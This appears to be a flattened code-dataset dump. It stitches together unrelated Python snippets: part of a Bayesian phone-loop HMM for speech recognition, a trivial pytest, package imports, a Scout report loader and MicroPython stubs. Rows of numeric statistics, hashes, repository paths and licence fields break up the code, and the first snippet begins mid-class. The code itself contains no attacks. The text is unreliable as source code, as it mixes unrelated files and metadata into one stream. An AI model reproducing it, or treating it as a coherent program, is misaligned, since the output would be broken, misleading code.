self.end_pdf = end_pdf
self.categorical = categorical
param = self.categorical.mean_field_factorization()[0][0]
param.register_callback(self._on_weights_update)
self._on_weights_update()
def _on_weights_update(self):
mean = self.categorical.mean
tensorconf = {'dtype': mean.dtype, 'device': mean.device,
'requires_grad': False}
data = torch.eye(len(self.start_pdf), **tensorconf)
stats = self.categorical.sufficient_statistics(data)
log_weights = self.categorical.expected_log_likelihood(stats)
start_idxs = [value for value in self.start_pdf.values()]
for end_idx in self.end_pdf.values():
loop_prob = self.graph.trans_log_probs[end_idx, end_idx].exp()
residual_log_prob = (1 - loop_prob).log()
self.graph.trans_log_probs[end_idx, start_idxs] = \
residual_log_prob + log_weights
####################################################################
# Model interface.
def mean_field_factorization(self):
l1 = self.modelset.mean_field_factorization()
l2 = self.categorical.mean_field_factorization()
diff = len(l1) - len(l2)
if diff > 0:
l2 += [[] for _ in range(abs(diff))]
else:
l1 += [[] for _ in range(abs(diff))]
return [u + v for u, v in zip(l1, l2)]
def expected_log_likelihood(self, *args, **kwargs):
return super().expected_log_likelihood(*args, **kwargs)
def accumulate(self, stats, parent_msg=None):
retval = super().accumulate(stats, parent_msg)
# If the phone loop is trained with forced alignments, we don't
# train the transitions.
if 'trans_resps' in self.cache:
trans_resps = self.cache['trans_resps'].sum(dim=0)
start_idxs = [value for value in self.start_pdf.values()]
end_idxs = [value for value in self.end_pdf.values()]
phone_resps = trans_resps[:, start_idxs]
phone_resps = phone_resps[end_idxs, :].sum(dim=0)
phone_resps += self.cache['resps'][0][start_idxs]
resps_stats = self.categorical.sufficient_statistics(
phone_resps.view(1, -1))
retval.update(self.categorical.accumulate(resps_stats))
else:
fake_stats = torch.zeros_like(self.categorical.mean, requires_grad=False)
retval.update(self.categorical.accumulate(fake_stats[None, :]))
return retval
class BigramPhoneLoop(HMM):
'Phone Loop HMM with Bigram phonotactic language model..'
@classmethod
def create(cls, graph, start_pdf, end_pdf, modelset, categoricalset=None,
prior_strength=1.0):
'''Create a BigramPhoneLoop model.
Args:
graph (:any:`CompiledGraph`): Decoding graph of the
phone-loop.
start_pdf (dict): Mapping symbol/start state of the
corresponding sub-HMM.
end_pdf (dict): Mapping symbol/end state of the
corresponding sub-HMM.
categoricalset (``CategoricalSet``): Set of categorical models
of the mixing weights.
prior_strength (float): Strength of the prior over the
weights.
'''
# We look at one parameter to check the type of the model.
bayes_param = modelset.mean_field_factorization()[0][0]
tensor = bayes_param.prior.natural_parameters()
dtype, device = tensor.dtype, tensor.device
if categoricalset is None:
weights = torch.ones(len(start_pdf), len(start_pdf), dtype=dtype,
device=device)
weights /= len(start_pdf)
categoricalset = CategoricalSet.create(weights, prior_strength)
return cls(graph, modelset, start_pdf, end_pdf, categoricalset)
def __init__(self, graph, modelset, start_pdf, end_pdf, categoricalset):
super().__init__(graph, modelset)
self.start_pdf = start_pdf
self.end_pdf = end_pdf
self.categoricalset = categoricalset
param = self.categoricalset.mean_field_factorization()[0][0]
param.register_callback(self._on_weights_update)
self._on_weights_update()
def _on_weights_update(self):
mean = self.categoricalset.mean
tensorconf = {'dtype': mean.dtype, 'device': mean.device,
'requires_grad': False}
data = torch.eye(len(self.start_pdf), **tensorconf)
stats = self.categoricalset.sufficient_statistics(data)
log_weights = self.categoricalset.expected_log_likelihood(stats)
start_idxs = [value for value in self.start_pdf.values()]
for i, end_idx in enumerate(self.end_pdf.values()):
loop_prob = self.graph.trans_log_probs[end_idx, end_idx].exp()
residual_log_prob = (1 - loop_prob).log()
self.graph.trans_log_probs[end_idx, start_idxs] = \
residual_log_prob + log_weights[i]
####################################################################
# Model interface.
def mean_field_factorization(self):
l1 = self.modelset.mean_field_factorization()
l2 = self.categoricalset.mean_field_factorization()
diff = len(l1) - len(l2)
if diff > 0:
l2 += [[] for _ in range(abs(diff))]
else:
l1 += [[] for _ in range(abs(diff))]
return [u + v for u, v in zip(l1, l2)]
def expected_log_likelihood(self, *args, **kwargs):
return super().expected_log_likelihood(*args, **kwargs)
def accumulate(self, stats, parent_msg=None):
retval = super().accumulate(stats, parent_msg)
# If the phone loop is trained with forced alignments, we don't
# train the transitions.
if 'trans_resps' in self.cache:
trans_resps = self.cache['trans_resps']#.sum(dim=0)
start_idxs = [value for value in self.start_pdf.values()]
end_idxs = [value for value in self.end_pdf.values()]
phone_resps = trans_resps[:, :, start_idxs]
phone_resps = phone_resps[:, end_idxs, :]
resps_stats = self.categoricalset.sufficient_statistics(phone_resps)
retval.update(self.categoricalset.accumulate_from_jointresps(resps_stats))
else:
fake_stats = torch.zeros_like(self.categoricalset.mean,
requires_grad=False)
retval.update(self.categoricalset.accumulate(fake_stats[None, :]))
return retval
| 43.177083
| 86
| 0.616767
| 968
| 8,290
| 5.061983
| 0.143595
| 0.037551
| 0.044898
| 0.017143
| 0.845918
| 0.790816
| 0.76102
| 0.725102
| 0.713878
| 0.681633
| 0
| 0.006282
| 0.270326
| 8,290
| 191
| 87
| 43.403141
| 0.803769
| 0.156695
| 0
| 0.55814
| 0
| 0
| 0.028452
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.093023
| false
| 0
| 0.046512
| 0.015504
| 0.217054
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ad83311d93890f3b9b3fc3aa7d3a87abef0b5382
| 208
|
py
|
Python
|
tests/_initial/test_initial.py
|
alfmorais/api-pbe-veicular
|
802a4c36a65b291956eef1eb12128380392518b3
|
[
"MIT"
] | 1
|
2022-03-02T17:50:33.000Z
|
2022-03-02T17:50:33.000Z
|
tests/_initial/test_initial.py
|
alfmorais/api-pbe-veicular
|
802a4c36a65b291956eef1eb12128380392518b3
|
[
"MIT"
] | null | null | null |
tests/_initial/test_initial.py
|
alfmorais/api-pbe-veicular
|
802a4c36a65b291956eef1eb12128380392518b3
|
[
"MIT"
] | null | null | null |
def test_initial():
first_number = 5
second_number = 6
assert (first_number + second_number) == 11
assert (first_number - second_number) == -1
assert (first_number * second_number) == 30
| 26
| 47
| 0.673077
| 27
| 208
| 4.851852
| 0.444444
| 0.335878
| 0.389313
| 0.526718
| 0.664122
| 0
| 0
| 0
| 0
| 0
| 0
| 0.043478
| 0.225962
| 208
| 7
| 48
| 29.714286
| 0.770186
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.166667
| false
| 0
| 0
| 0
| 0.166667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ad8e97d0939f378e7a8f0c37161e26dbbaa47cf5
| 25
|
py
|
Python
|
facade/__init__.py
|
oakfang/facade
|
a6f258b69d562b77ae5558003fad4bd56389ad45
|
[
"MIT"
] | 2
|
2016-01-31T22:32:31.000Z
|
2017-07-24T04:24:25.000Z
|
facade/__init__.py
|
oakfang/facade
|
a6f258b69d562b77ae5558003fad4bd56389ad45
|
[
"MIT"
] | null | null | null |
facade/__init__.py
|
oakfang/facade
|
a6f258b69d562b77ae5558003fad4bd56389ad45
|
[
"MIT"
] | null | null | null |
from .base import loader
| 12.5
| 24
| 0.8
| 4
| 25
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16
| 25
| 1
| 25
| 25
| 0.952381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d1529128f1eb4a240fbb679aa36c2ef84a095223
| 248
|
py
|
Python
|
openapi_server/utils/GenRandom.py
|
tys-hiroshi/bnoteapi
|
d0eb6b4f3b46c11a1c893966d99e3fc01bf6e960
|
[
"MIT"
] | null | null | null |
openapi_server/utils/GenRandom.py
|
tys-hiroshi/bnoteapi
|
d0eb6b4f3b46c11a1c893966d99e3fc01bf6e960
|
[
"MIT"
] | 9
|
2020-05-22T10:49:35.000Z
|
2020-08-26T12:25:23.000Z
|
openapi_server/utils/GenRandom.py
|
tys-hiroshi/bnoteapi
|
d0eb6b4f3b46c11a1c893966d99e3fc01bf6e960
|
[
"MIT"
] | 1
|
2020-08-06T06:19:39.000Z
|
2020-08-06T06:19:39.000Z
|
# coding: UTF-8
import random
class GenRandom:
def __init__(self):
pass
def generate_random_index(self, max_indexnum):
# ランダムに複数の要素を選択 重複なし
return random.sample(list(range(0, max_indexnum)), k=max_indexnum)
| 17.714286
| 74
| 0.665323
| 31
| 248
| 5.032258
| 0.741935
| 0.211538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010695
| 0.245968
| 248
| 13
| 75
| 19.076923
| 0.823529
| 0.129032
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0.166667
| 0.166667
| 0.166667
| 0.833333
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 6
|
0f0c014357419a4620c043e5031b70bd6fc48b5d
| 296
|
py
|
Python
|
fugue_ibis/__init__.py
|
LaurentErreca/fugue
|
73d551b4d25b50b3d9051dd765e6111db2e3fc76
|
[
"Apache-2.0"
] | null | null | null |
fugue_ibis/__init__.py
|
LaurentErreca/fugue
|
73d551b4d25b50b3d9051dd765e6111db2e3fc76
|
[
"Apache-2.0"
] | null | null | null |
fugue_ibis/__init__.py
|
LaurentErreca/fugue
|
73d551b4d25b50b3d9051dd765e6111db2e3fc76
|
[
"Apache-2.0"
] | null | null | null |
# flake8: noqa
from fugue_ibis.execution.ibis_engine import IbisEngine, register_ibis_engine
from fugue_ibis.execution.pandas_backend import _to_pandas_ibis_engine
from fugue_ibis.extensions import as_fugue, as_ibis, run_ibis
def register():
register_ibis_engine(1, _to_pandas_ibis_engine)
| 32.888889
| 77
| 0.851351
| 45
| 296
| 5.155556
| 0.4
| 0.215517
| 0.168103
| 0.189655
| 0.198276
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007463
| 0.094595
| 296
| 8
| 78
| 37
| 0.858209
| 0.040541
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.6
| 0
| 0.8
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0f245e9cd154c3f71850ad9528aa67bd9e0acb0d
| 96
|
py
|
Python
|
venv/lib/python3.8/site-packages/pip/_internal/commands/cache.py
|
Retraces/UkraineBot
|
3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71
|
[
"MIT"
] | 2
|
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/pip/_internal/commands/cache.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | 19
|
2021-11-20T04:09:18.000Z
|
2022-03-23T15:05:55.000Z
|
venv/lib/python3.8/site-packages/pip/_internal/commands/cache.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/54/8e/49/c8110edd4e89fd81783c8961a8faf9a3b95e426e04a7f2f237a8dde190
| 96
| 96
| 0.895833
| 9
| 96
| 9.555556
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.416667
| 0
| 96
| 1
| 96
| 96
| 0.479167
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
7e1fdc318ae685ba70482c7e44d14ffb50b46fab
| 2,710
|
py
|
Python
|
scout/load/report.py
|
mhkc/scout
|
a7162f28c0f3490c3f3376268118fa8e6072a9db
|
[
"BSD-3-Clause"
] | null | null | null |
scout/load/report.py
|
mhkc/scout
|
a7162f28c0f3490c3f3376268118fa8e6072a9db
|
[
"BSD-3-Clause"
] | null | null | null |
scout/load/report.py
|
mhkc/scout
|
a7162f28c0f3490c3f3376268118fa8e6072a9db
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
import logging
from scout.adapter import MongoAdapter
from scout.exceptions import IntegrityError, DataNotFoundError
LOG = logging.getLogger(__name__)
def load_delivery_report(
adapter: MongoAdapter, report_path: str, case_id: str, update: bool = False
):
"""Load a delivery report into a case in the database
If the report already exists the function will exit.
If the user want to load a report that is already in the database
'update' has to be 'True'
Args:
adapter (MongoAdapter): Connection to the database
report_path (string): Path to delivery report
case_id (string): Optional case identifier
update (bool): If an existing report should be replaced
Returns:
updated_case(dict)
"""
case_obj = adapter.case(case_id=case_id)
if case_obj is None:
raise DataNotFoundError("no case found")
if update or case_obj.get("delivery_report") is None:
_update_report_path(case_obj, report_path, "delivery_report")
else:
raise IntegrityError("Existing report found, use update = True to " "overwrite")
LOG.info("Saving report for case {} in database".format(case_obj["_id"]))
return adapter.replace_case(case_obj)
def load_cnv_report(adapter: MongoAdapter, report_path: str, case_id: str, update: bool = False):
"""Load a CNV report into a case in the database
If the report already exists the function will exit.
If the user want to load a report that is already in the database
'update' has to be 'True'
Args:
adapter (MongoAdapter): Connection to the database
report_path (string): Path to CNV report
case_id (string): Optional case identifier
update (bool): If an existing report should be replaced
Returns:
updated_case(dict)
"""
case_obj = adapter.case(case_id=case_id)
if case_obj is None:
raise DataNotFoundError("no case found")
if update or case_obj.get("cnv_report") is None:
_update_report_path(case_obj, report_path, "cnv_report")
else:
raise IntegrityError("Existing report found, use update = True to " "overwrite")
LOG.info("Saving report for case {} in database".format(case_obj["_id"]))
return adapter.replace_case(case_obj)
def _update_report_path(case_obj, report_path, report_type):
"""Updates the report path
Args:
case_obj (Case): Case object
report_path (string): Path to CNV report
report_type (string): Type of report
"""
case_obj[report_type] = report_path
return True
| 31.511628
| 97
| 0.667897
| 365
| 2,710
| 4.789041
| 0.213699
| 0.060069
| 0.029748
| 0.034325
| 0.817506
| 0.817506
| 0.817506
| 0.779176
| 0.779176
| 0.779176
| 0
| 0.000495
| 0.253875
| 2,710
| 85
| 98
| 31.882353
| 0.863996
| 0.425092
| 0
| 0.482759
| 0
| 0
| 0.183345
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.103448
| false
| 0
| 0.103448
| 0
| 0.310345
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
7e4cda9d319d1d2a96da56371cda9996475e1d2e
| 201
|
py
|
Python
|
stubs/esp32_1_10_0/ubinascii.py
|
jmannau/micropython-stubber
|
8930e8a0038192fd259b31a193d1da3b2501256a
|
[
"MIT"
] | null | null | null |
stubs/esp32_1_10_0/ubinascii.py
|
jmannau/micropython-stubber
|
8930e8a0038192fd259b31a193d1da3b2501256a
|
[
"MIT"
] | null | null | null |
stubs/esp32_1_10_0/ubinascii.py
|
jmannau/micropython-stubber
|
8930e8a0038192fd259b31a193d1da3b2501256a
|
[
"MIT"
] | null | null | null |
"Module 'ubinascii' on firmware 'v1.10-247-g0fb15fc3f on 2019-03-29'"
def a2b_base64():
pass
def b2a_base64():
pass
def crc32():
pass
def hexlify():
pass
def unhexlify():
pass
| 11.823529
| 69
| 0.636816
| 29
| 201
| 4.344828
| 0.655172
| 0.222222
| 0.206349
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.168831
| 0.233831
| 201
| 16
| 70
| 12.5625
| 0.649351
| 0.333333
| 0
| 0.454545
| 0
| 0.090909
| 0.335
| 0.105
| 0
| 0
| 0
| 0
| 0
| 1
| 0.454545
| true
| 0.454545
| 0
| 0
| 0.454545
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
7e9518049d723b3eed655c1940d088c1193a64ec
| 343
|
py
|
Python
|
bitmovin_api_sdk/encoding/encodings/muxings/mp4/drm/clearkey/__init__.py
|
jaythecaesarean/bitmovin-api-sdk-python
|
48166511fcb9082041c552ace55a9b66cc59b794
|
[
"MIT"
] | 11
|
2019-07-03T10:41:16.000Z
|
2022-02-25T21:48:06.000Z
|
bitmovin_api_sdk/encoding/encodings/muxings/mp4/drm/clearkey/__init__.py
|
jaythecaesarean/bitmovin-api-sdk-python
|
48166511fcb9082041c552ace55a9b66cc59b794
|
[
"MIT"
] | 8
|
2019-11-23T00:01:25.000Z
|
2021-04-29T12:30:31.000Z
|
bitmovin_api_sdk/encoding/encodings/muxings/mp4/drm/clearkey/__init__.py
|
jaythecaesarean/bitmovin-api-sdk-python
|
48166511fcb9082041c552ace55a9b66cc59b794
|
[
"MIT"
] | 13
|
2020-01-02T14:58:18.000Z
|
2022-03-26T12:10:30.000Z
|
from bitmovin_api_sdk.encoding.encodings.muxings.mp4.drm.clearkey.clearkey_api import ClearkeyApi
from bitmovin_api_sdk.encoding.encodings.muxings.mp4.drm.clearkey.customdata.customdata_api import CustomdataApi
from bitmovin_api_sdk.encoding.encodings.muxings.mp4.drm.clearkey.clear_key_drm_list_query_params import ClearKeyDrmListQueryParams
| 85.75
| 131
| 0.900875
| 47
| 343
| 6.297872
| 0.425532
| 0.121622
| 0.152027
| 0.182432
| 0.567568
| 0.567568
| 0.567568
| 0.567568
| 0.567568
| 0.567568
| 0
| 0.009063
| 0.034985
| 343
| 3
| 132
| 114.333333
| 0.885196
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0e19aeea80ebe518e37f6e22c7449d3bd3cc9e45
| 26
|
py
|
Python
|
terrascript/local/__init__.py
|
vfoucault/python-terrascript
|
fe82b3d7e79ffa72b7871538f999828be0a115d0
|
[
"BSD-2-Clause"
] | null | null | null |
terrascript/local/__init__.py
|
vfoucault/python-terrascript
|
fe82b3d7e79ffa72b7871538f999828be0a115d0
|
[
"BSD-2-Clause"
] | null | null | null |
terrascript/local/__init__.py
|
vfoucault/python-terrascript
|
fe82b3d7e79ffa72b7871538f999828be0a115d0
|
[
"BSD-2-Clause"
] | null | null | null |
"""2017-11-28 18:08:03"""
| 13
| 25
| 0.538462
| 6
| 26
| 2.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.583333
| 0.076923
| 26
| 1
| 26
| 26
| 0
| 0.730769
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0e1c0d5dd1938065a5be011456c85775138d3450
| 67
|
py
|
Python
|
tests/test_3_hello.py
|
MartaPrzyBorze/python-example
|
f2b8731e4c972101422a500ac08f29f7f9157332
|
[
"MIT"
] | null | null | null |
tests/test_3_hello.py
|
MartaPrzyBorze/python-example
|
f2b8731e4c972101422a500ac08f29f7f9157332
|
[
"MIT"
] | null | null | null |
tests/test_3_hello.py
|
MartaPrzyBorze/python-example
|
f2b8731e4c972101422a500ac08f29f7f9157332
|
[
"MIT"
] | null | null | null |
import hello
def test_says_world():
assert hello.main() == 0
| 11.166667
| 28
| 0.671642
| 10
| 67
| 4.3
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018868
| 0.208955
| 67
| 5
| 29
| 13.4
| 0.792453
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0e57f26c2c23702fe3c7eb194eb643c8084ed0ee
| 31
|
py
|
Python
|
dashtable/data2rst/__init__.py
|
r-dgreen/DashTable
|
744cfb6a717fa75a8092c83ebcd49b2668023681
|
[
"MIT"
] | 35
|
2017-04-25T04:37:16.000Z
|
2022-02-23T05:44:37.000Z
|
dashtable/data2rst/__init__.py
|
r-dgreen/DashTable
|
744cfb6a717fa75a8092c83ebcd49b2668023681
|
[
"MIT"
] | 14
|
2016-12-11T12:00:48.000Z
|
2021-06-13T06:52:09.000Z
|
dashtable/data2rst/__init__.py
|
r-dgreen/DashTable
|
744cfb6a717fa75a8092c83ebcd49b2668023681
|
[
"MIT"
] | 11
|
2017-04-05T14:10:16.000Z
|
2022-02-14T16:32:18.000Z
|
from .data2rst import data2rst
| 15.5
| 30
| 0.83871
| 4
| 31
| 6.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074074
| 0.129032
| 31
| 1
| 31
| 31
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0e65030b0e8d80c85b0df0b92d5ff55104f23856
| 236
|
py
|
Python
|
autocast/__init__.py
|
pmojo375/PLC
|
56750a7c835463a1018f5ae3b00b5f944d053a14
|
[
"MIT"
] | null | null | null |
autocast/__init__.py
|
pmojo375/PLC
|
56750a7c835463a1018f5ae3b00b5f944d053a14
|
[
"MIT"
] | null | null | null |
autocast/__init__.py
|
pmojo375/PLC
|
56750a7c835463a1018f5ae3b00b5f944d053a14
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
from autocast.autocast import autocast
| 23.6
| 39
| 0.813559
| 31
| 236
| 5.580645
| 0.548387
| 0.231214
| 0.369942
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004831
| 0.122881
| 236
| 9
| 40
| 26.222222
| 0.830918
| 0.177966
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.2
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0ead769a83acb3dbc123dfdf27600bdebcffc035
| 155
|
py
|
Python
|
relentless/__init__.py
|
mphoward/relentless
|
5f7e8eb62696f45df28a948202b324563805a7f5
|
[
"BSD-3-Clause"
] | null | null | null |
relentless/__init__.py
|
mphoward/relentless
|
5f7e8eb62696f45df28a948202b324563805a7f5
|
[
"BSD-3-Clause"
] | 8
|
2019-12-19T21:27:25.000Z
|
2019-12-20T02:47:00.000Z
|
relentless/__init__.py
|
mphoward/relentless
|
5f7e8eb62696f45df28a948202b324563805a7f5
|
[
"BSD-3-Clause"
] | null | null | null |
from . import ensemble
from . import mpi
from . import optimize
from . import potential
from . import simulate
from . import variable
from . import volume
| 19.375
| 23
| 0.774194
| 21
| 155
| 5.714286
| 0.428571
| 0.583333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.180645
| 155
| 7
| 24
| 22.142857
| 0.944882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0eb16e2c714b1a736ca99dca24ccea4d24e1f504
| 310
|
py
|
Python
|
entity/__init__.py
|
Simplon-IA-Biarritz-1/the-movie-predictor-DROMZEE
|
ceb443eac83110fa34c72f96dca367ffa4c1204f
|
[
"MIT"
] | 1
|
2020-03-26T12:01:42.000Z
|
2020-03-26T12:01:42.000Z
|
entity/__init__.py
|
Simplon-IA-Biarritz-1/the-movie-predictor-DROMZEE
|
ceb443eac83110fa34c72f96dca367ffa4c1204f
|
[
"MIT"
] | null | null | null |
entity/__init__.py
|
Simplon-IA-Biarritz-1/the-movie-predictor-DROMZEE
|
ceb443eac83110fa34c72f96dca367ffa4c1204f
|
[
"MIT"
] | 1
|
2021-05-14T18:25:29.000Z
|
2021-05-14T18:25:29.000Z
|
from entity.name_basics import NameBasics
from entity.title_akas import TitleAkas
from entity.title_basics import TitleBasics
from entity.title_crew import TitleCrew
from entity.title_episode import TitleEpisode
from entity.title_principals import TitlePrincipals
from entity.title_ratings import TitleRatings
| 38.75
| 51
| 0.887097
| 42
| 310
| 6.380952
| 0.428571
| 0.261194
| 0.335821
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090323
| 310
| 7
| 52
| 44.285714
| 0.950355
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7ebec3966ea8d07b2af21a542d8ce50752389218
| 57
|
py
|
Python
|
OpenCLGA/utilities/httpwebsocketserver/__init__.py
|
czarnobylu/OpenCLGA
|
c002b5177104db5bcdbb0192db25fbbb45516f27
|
[
"MIT"
] | 112
|
2017-04-07T06:02:10.000Z
|
2022-02-18T11:49:11.000Z
|
OpenCLGA/utilities/httpwebsocketserver/__init__.py
|
czarnobylu/OpenCLGA
|
c002b5177104db5bcdbb0192db25fbbb45516f27
|
[
"MIT"
] | 25
|
2016-11-22T08:22:53.000Z
|
2017-03-01T14:46:33.000Z
|
OpenCLGA/utilities/httpwebsocketserver/__init__.py
|
czarnobylu/OpenCLGA
|
c002b5177104db5bcdbb0192db25fbbb45516f27
|
[
"MIT"
] | 34
|
2017-05-22T02:56:08.000Z
|
2022-02-06T05:20:56.000Z
|
from .HTTPWebSocketsHandler import HTTPWebSocketsHandler
| 28.5
| 56
| 0.912281
| 4
| 57
| 13
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.070175
| 57
| 1
| 57
| 57
| 0.981132
| 0
| 0
